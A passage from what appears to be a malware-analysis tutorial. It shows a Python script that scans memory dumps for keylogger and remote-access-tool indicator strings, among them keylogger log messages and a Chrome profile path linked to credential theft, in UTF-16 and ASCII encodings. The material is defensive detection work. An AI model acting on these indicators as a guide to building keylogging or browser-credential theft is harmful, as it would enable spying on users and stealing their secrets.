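    indicators embedded at offsets 64 (wide), 176 (wide), 298 (narrow), 371 (narrow)."""
    pad = b"\x00" * 64
    return b"".join([
        pad, "Online Keylogger Stopped".encode("utf-16-le"),
        pad, "\\AppData\\Local\\Google\\Chrome\\".encode("utf-16-le"),
        pad, b"pth_unenc",
        pad, b"KeepAlive | Enabled | Timeout: ",
        pad,
    ])


if __name__ == "__main__":
    # Pass a raw dump path (assumed to be a flat byte image) to scan real data;
    # with no argument the constructed sample is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    found = scan(data)
    for off, enc, ind in found:
        print(f"0x{off:08x} {enc:8s} {ind!r}")
    print("capabilities:", ", ".join(summarize(found)))
```

Searching both encodings matters in practice: a narrow-only search misses the registry and browser paths entirely, while a wide-only search misses the format string and the ANSI log markers. Treat the capability labels as a starting point for the analyst's notes, not as verdicts; a single hit on a short marker such as "[AltL]" is weak evidence on its own.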